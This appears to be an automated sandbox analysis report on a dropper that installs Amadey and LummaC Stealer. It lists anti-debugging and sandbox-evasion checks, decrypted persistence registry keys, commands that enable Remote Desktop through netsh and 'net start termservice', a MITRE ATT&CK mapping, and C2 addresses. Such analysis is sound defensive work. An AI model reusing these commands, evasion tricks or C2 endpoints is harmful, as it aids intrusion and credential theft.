Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 10_2_04E40C79 Start: 04E40D24 End: 04E40C93

10_2_04E40C79

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe

Code function: 0_2_053F0E9B rdtsc

0_2_053F0E9B

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_0047DB60 mov eax, dword ptr fs:[00000030h]		10_2_0047DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 10_2_00485FF2 mov eax, dword ptr fs:[00000030h]		10_2_00485FF2

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 10_2_00458700 ShellExecuteA,CreateThread,

10_2_00458700

Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe "C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe"			Jump to behavior

Source: rapes.exe, rapes.exe, 0000000A.00000002.3622852362.0000000000650000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: vProgram Manager
Source: 958e367d97.exe, 958e367d97.exe, 0000000D.00000002.2778212912.0000000000537000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: $/Program Manager

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 10_2_00479AB5 cpuid

10_2_00479AB5

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 10_2_004793A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

10_2_004793A7

Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 2.2.rapes.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rapes.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.L0erlgyZ6f.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218362790.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3622417098.0000000000451000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: 13.2.958e367d97.exe.340000.0.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: 13.2.958e367d97.exe.340000.0.unpack, type: UNPACKEDPE

Contains functionality to start a terminal service

Source: L0erlgyZ6f.exe	String found in binary or memory: net start termservice
Source: L0erlgyZ6f.exe, 00000000.00000002.1218362790.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: L0erlgyZ6f.exe, 00000000.00000002.1218362790.0000000000F71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000A.00000002.3622417098.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000A.00000002.3622417098.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Exploitation for Privilege Escalation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	225 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10198690101\958e367d97.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 13.2.958e367d97.exe.340000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["cocjkoonpillow.today/bVzx", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 176.113.115.6
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Ni9kiput/index.php
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: bb556cff4a
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rapes.exe
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.1254740555.0000000000451000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
